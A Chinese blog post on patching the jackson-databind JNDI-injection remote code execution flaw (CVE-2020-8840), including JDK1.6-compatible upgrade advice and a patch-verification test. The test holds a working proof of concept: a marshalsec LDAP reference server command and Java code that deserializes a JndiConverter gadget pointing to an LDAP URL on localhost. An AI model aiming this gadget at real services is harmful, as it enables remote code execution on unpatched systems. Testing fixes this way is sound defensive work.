jackson-databind远程代码执行漏洞(CVE-2020-8840)修复与测试

最新推荐文章于 2024-08-07 20:45:31 发布
最新推荐文章于 2024-08-07 20:45:31 发布
阅读量3.9k 收藏 1
点赞数
分类专栏: Java Web 漏洞修复
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Quarrie/article/details/105902299
版权
Java 同时被 3 个专栏收录
7 篇文章 0 订阅
订阅专栏
Web
4 篇文章 0 订阅
订阅专栏
漏洞修复
1 篇文章 0 订阅
订阅专栏

漏洞介绍

攻击者可以利用此漏洞通过JNDI注入的方式执行本地Web容器下的任意代码,后文中将测试LDAP方式的远程代码调用,受影响版参见:NVD

修复建议

网上能找到的大部分修复建议是将jackson-databind的版本升级到2.9.10.4或后续版本,此方法的确行之有效,但是对于使用JDK1.6的老项目就比较尴尬,因为至2.8版本后jackson-databind字节码不再兼容JDK1.6,运行时会报Unsupported major.minor version 51.0错误,对于这种情况可以使用2.7.9.7版本修复,该版本的字节码仍然兼容JDK1.6,且确实具有修复效果,其佐证如下:

漏洞测试

此漏洞会将特定输入进行JNDI转换并执行,这里测试只测试到调用端收到请求,实际执行类并未编写,测试步骤:

  1. 使用Marshalsec工具开启LDAP服务
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://localhost:8080/#ExportObject 1389
  1. 使用ObjectMapper.readValue方法对特定的字符串进行对象映射
ObjectMapper mapper = new ObjectMapper();

        mapper.enableDefaultTyping();

            String json = "[\"org.apache.xbean.propertyeditor.JndiConverter\", {\"asText\":\"ldap://localhost:1389/ExportObject\"}]";

        try {
            mapper.readValue(json, Object.class);
        } catch (IOException e) {
            e.printStackTrace();
        }
  1. 测试结果
漏洞版本:
Send LDAP reference result for ExportObject redirecting to http://localhost:8080/ExportObject.class

修复版本:没有收到LDAP请求

备注:以上观察结果为运行Marshalsec的控制台输出,修改jackson-databind后记得Maven需要Import Change。

附件中有测试项目,Marshalsec位于项目的resources目录下,可找到绝对路径调用。

Quarrie
关注
专栏目录
jackson-CVE-2020-8840:FasterXMLjackson-databind远程代码执行漏洞
03-08
2020年,一个名为CVE-2020-8840的重大安全漏洞被公开,这个漏洞存在于FasterXML的jackson-databind组件中,可能导致远程代码执行(RCE)的风险。 远程代码执行漏洞是一种极其危险的安全漏洞,攻击者可以利用它在...
Jackson序列化远程代码执行漏洞修复
Delphinidae
03-05 4395
安全参考链接:https://mp.weixin.qq.com/s/gHnSfsMuLLlk7lQ4f5Nkdw 漏洞影响:JNDI注入导致远程代码执行 CVE编号:暂时没发布,(fastjson的cveCVE-2020-8840) 解决方案:1 升级jackson-databind >= 2.10.0 2 项目代码中剔除使用enableDefaultTyping类的使用,用官方给出的类替...
fastjson、jackson databind漏洞修复记录
Mr.Niu的博客
02-11 2646
解决方案也是让升级jar包到2.14.0-rc2版本或以上,但是直接升级的时候有问题,springboot中的 spring-boot-starter-web 包中包含了jackson的版本(里面有个 spring-boot-starter-json,这个包里制定了jackson的相关版本),升级springboot版本或者其他方式,都对现有的项目造成了影响。声明:本人所写博客无任何权威性,解决办法是否符合自己的项目,自行判断。项目运行无问题,jar的版本都符合解决方案,然后上线发布……
Jackson 反序列化漏洞
最新发布
qq_50296568的博客
08-07 1050
CVE-2017-7525 是 Jackson 数据绑定库(jackson-databind)中的一个严重漏洞,允许攻击者通过反序列化恶意构造的 JSON 数据来执行任意代码。攻击者构造特制的 JSON 数据,包含 @class 字段,指向一个易受攻击的类(如 com.zaxxer.hikari.HikariConfig,该类在初始化时会执行某些操作)。在这个示例中,@class 字段指定了 com.zaxxer.hikari.HikariConfig 类,而其属性则是 HikariCP 数据源的配置。
【安全漏洞jackson-databind漏洞、 异常NoClassDefFoundError: Could not initialize class com.fasterxml.jackson
热门推荐
开着奥迪卖小猪
07-25 1万+
一、jackson-databind漏洞 国家信息安全漏洞库:http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201906-867 二、发现项目中有使用2.6.3版本的jackson,所以进行升级 jackson-databind 升级到2.9.9.1、 jackson...
CVE-2020-8840:Jackson-databind RCE
Fly_鹏程万里
07-11 2664
影响范围 jackson-databind before 2.9.10.3 jackson-databind before2.8.11.5 jackson-databind before2.7.9.7 漏洞类型 JDNI注入导致RCE 利用条件 开启enableDefaultTyping() 使用了org.apache.xbean.propertyeditor.JndiConverter第三方依赖 漏洞概述 2020年2月,jackson-databind在github上更新了一个新的反..
jackson异常处理
来年三月
04-27 456
一 问题  Hive报错Java.lang.NoClassDefFoundError:  org/codehaus/jackson/JsonFactory 二 原因 Hadoop版本是0.20.2.$HADOOP_HOME/lib中不包含 jackson-core-asl-1.8.8.jar jackson-jaxrs-1.8.8.jar
CVE-2020-35728:CVE-2020-35728 和 Jackson-databind RCE
05-31
2.9.10.8 之前的 FasterXML jackson-databind 2.x 错误处理了与 com.oracle.wls.shaded.org.apache.xalan.lib.sql.JNDIConnectionPool(又名嵌入 org.glassfish 中的 Xalan)相关的序列化小工具和类型之间的交互。...
jackson-databind漏洞问题
08-01
jackson-databind-2.8.1 适用于jdk1.7 jackson-databind-2.11.2 适用于jdk1.8 jackson-databind-2.7.9.2 适用于jdk1.6
jackson-databind-2.9.10.8.jar升级相关jar包
04-21
jackson-databind-2.9.10.8.jar升级相关jar包包含: jackson-module-jaxb-annotations-2.9.10.jar jackson-core-2.9.10.jar jackson-databind-2.9.10.8.jar jackson-annotations-2.9.10.jar jackson-jaxrs-json-...
jackson-databind-vuln:Jackson Databind漏洞
05-26
然而,Jackson Databind存在一系列的安全漏洞,这些漏洞可能导致远程代码执行(RCE)攻击,严重影响应用程序的安全性。 Jackson库本身是一个高效的、功能丰富的JSON解析和序列化框架,它的核心组件包括Jackson Core...
java jackson漏洞_小白审计JACKSON反序列化漏洞
weixin_29100399的博客
02-16 1655
1. JACKSON漏洞解析poc代码:main.javaimportcom.fasterxml.jackson.databind.ObjectMapper;importcom.sun.org.apache.xerces.internal.impl.dv.util.Base64;importorg.springframework.util.FileCopyUtils;importjava.io.B...
探索Jackson库的安全漏洞修复CVE-2020-8840
gitblog_00016的博客
04-05 553
探索Jackson库的安全漏洞修复CVE-2020-8840 项目地址:https://gitcode.com/jas502n/jackson-CVE-2020-8840 项目简介 在此GitCode仓库中,开发者jas502n分享了对Jackson库中一个关键安全漏洞CVE-2020-8840的研究和修复过程。Jackson是Java最流行的JSON处理库之一,广泛应用于Web服务、后端开发等...
FasterXML Jackson-databind远程代码执行漏洞 CVE-2020-8840 已亲自复现 未完成
qq_42430287的博客
12-27 1581
受影响版本的jackson-databind中缺少某些xbean-reflect/JNDI黑名单类,如org.apache.xbean.propertyeditor.JndiConverter,导致攻击者可通过JNDI注入的方式对此漏洞进行利用,成功时可以实现远程代码执行。2.0.0
Jackson安全漏洞版本升级
北辰
02-27 6013
在使用jackson来解析json数据时会使用到如下jar包 目前maven的官方仓库中jackson-databind的2.8.11版本的安全版本最新为2.8.11.5且更新时间为2020年。 当使用到ObjectMapper时还需引入如下两个依赖: <dependency> <groupId>org.codehaus.jackson</grou...
Jackson 反序列化漏洞原理
王嘟嘟的博客
02-28 3079
Jackson 最基础的功能就是将制定的类 序列化 to json,然后json to 序列化的这样一个工具第三方库,正常情况下因为需要执行类进行转换,所以除非是故意留有后门,否则是不会出现问题的。但是为了处理一个情况,就是处理未知的json转换的时候,需要对多种场景进行处理。于是就有了Jackson多态机制。如:需要处理多个子类的情况。那么当json中的指定的类的seter或者无参构造方法中存在可利用点的时候,就会造成有效的反序列化攻击。也就是需要找的反序列化调用链。
UnsupportedClassVersionError:com/*/jackson/databind/ObjectMapper:Unsupported major.minor version 51.
进击中的程序媛
04-11 590
Caused by: java.lang.UnsupportedClassVersionError: com/fasterxml/jackson/databind/ObjectMapper : Unsupported major.minor version 51.0
【Java Web 安全】jackson漏洞探究、利用、预防
qqchaozai的专栏
08-15 4917
前言 阿里云安全公告:2019年7月31日,阿里云应急响应中心监测到有安全研究人员披露Jackson最新反序列化远程代码执行漏洞(CVE-2019-14361和CVE-2019-14439)。同事说怎么jackson这类的json序列化库经常报漏洞,而且基本都是高危漏洞,这些漏洞到底怎么来的,jackson的开发程序员就这么不靠谱么?改不完的BUG?这篇文章就让我们走进jackson的世界,感受...
java jackson漏洞_【Java进阶】Jackson安全漏洞,可导致服务器文件被恶意窃取
weixin_42322686的博客
02-16 832
上周升级完Fastjson之后,去了解了下Jackson是否也有相关的漏洞。 果不其然,看到了一个issue虽然这个issue是好几个月前的了,但是可能大家对Jackson比较不在意,以为国外的开源要牛逼一点,不会像Fastjson那么多问题,这里要纠正一点,fastjson之所以问题多,那是因为你接触的多,Jackson的问题其实也不少,只是你接触的少。 就拿这种issue的问题来说,这个漏洞...
jackson 序列化_安全通告:jackson-databind序列化漏洞CVE-2020-24616)
05-19
是的,jackson-databind 序列化漏洞CVE-2020-24616)是一个安全问题,可能会导致远程代码执行。该漏洞存在于 jackson-databind 库中,该库是一个流行的 Java 序列化/反序列化库,广泛用于各种应用程序和框架中。攻击者可以利用该漏洞构造恶意序列化数据,从而在受影响的应用程序中执行任意代码。 建议开发人员及时检查其应用程序是否使用了 jackson-databind 库,并升级到最新版本,以避免受到此漏洞的影响。同时,应该注意避免将不受信任的数据传递给 jackson-databind 序列化器,以减少漏洞利用的风险。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值